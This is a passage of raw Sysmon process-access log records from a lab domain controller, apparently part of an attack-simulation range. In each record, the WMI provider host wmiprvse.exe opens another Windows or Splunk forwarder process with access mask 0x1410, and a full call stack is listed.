15:59:26.069{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4FA9-6008-4405-00000000A301}7000C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024648Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:26.069{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4FA9-6008-4305-00000000A301}7420C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024647Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:26.069{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4DC0-6008-FB02-00000000A301}8056C:\Program Files\Internet Explorer\iexplore.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024646Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:26.069{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A9B-6008-1501-00000000A301}6076C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024645Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:26.069{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A99-6008-1401-00000000A301}5960C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024644Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:26.069{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8C-6008-0601-00000000A301}2500C:\Windows\Explorer.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024643Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:26.069{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8A-6008-FF00-00000000A301}4808C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024642Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:26.054{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8A-6008-FC00-00000000A301}5008C:\Windows\System32\rdpclip.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024641Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:26.054{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A88-6008-F600-00000000A301}1548C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024640Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:26.054{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A88-6008-F300-00000000A301}4180C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024639Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:26.054{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A27-6008-E400-00000000A301}2860C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024638Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:26.054{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A22-6008-DB00-00000000A301}4244C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024637Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:26.054{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A1A-6008-B100-00000000A301}2640C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024636Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:26.054{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A19-6008-AD00-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024635Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:26.054{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A11-6008-9600-00000000A301}4612C:\Windows\System32\msdtc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024634Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:26.054{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49BC-6008-8200-00000000A301}4876C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024633Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:26.054{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49BC-6008-8100-00000000A301}4864C:\Windows\system32\WinrsHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024632Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:26.054{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49AF-6008-7F00-00000000A301}4328C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024631Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:26.054{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49AF-6008-7E00-00000000A301}4316C:\Windows\system32\WinrsHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024630Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:26.054{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-499C-6008-5500-00000000A301}3796C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024629Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:26.054{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-499B-6008-5100-00000000A301}3588C:\Program 